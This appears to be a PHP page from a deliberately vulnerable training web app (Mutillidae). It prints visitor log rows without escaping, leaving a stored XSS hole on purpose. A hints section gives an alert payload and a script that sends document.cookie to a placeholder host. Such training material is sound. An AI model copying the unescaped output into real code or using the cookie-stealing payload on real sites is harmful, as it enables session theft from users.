-
Notifications
You must be signed in to change notification settings - Fork 3
/
show-log.php
executable file
·36 lines (35 loc) · 1.51 KB
/
show-log.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
<center><h2><b>Showing Log</b></h2></center><p>
<?php
$query = "SELECT * FROM `hitlog`";
$result = mysql_query($query) or die(mysql_error($conn) . '<p><b>SQL Statement:</b>' . $query);;
//echo $result;
echo '<TABLE border="1" width="100%">';
echo "<TR><TD><B>Hostname</B></font></TD><TD><B>IP</B></TD><TD><B>Browser Agent</B></TD><TD><B>Page Viewed</B></TD><TD><B>Date/Time</B></TD></TR>";
while($row = mysql_fetch_array($result, MYSQL_ASSOC))
{
echo "<TR><TD>{$row['hostname']}</TD><TD>{$row['ip']}</TD><TD>{$row['browser']}</TD><TD>{$row['referer']}</TD><TD>{$row['date']}</TD></TR>\n";
}
echo "</TABLE>";
//phpinfo();
?>
<?php
// Begin hints section
if ($_COOKIE["showhints"]==1) {
echo '<p><span style="background-color: #FFFF00">
<b>For XSS:</b>XSS is easy stuff. This one shows off both reflected (you see the results
instantly) and stored (someone can run across it later in another app that
uses the same database). "<script>alert("XSS");</script>" is the classic, but
there are far more interesting things you could do which I plan show in a video later.
For some hot cookie stealing action, try something like:
<pre>
<script>
new Image().src="http://some-ip/mutillidae/catch.php?cookie="+encodeURI(document.cookie);
</script>
</pre>
Also, check out <a href="http://ha.ckers.org/xss.html">Rsnake\'s XSS Cheat Sheet</a>
for more ways you can encode XSS attacks that may allow you to get around some filters.
<br><br>
</span>';
}
// End hints section
?>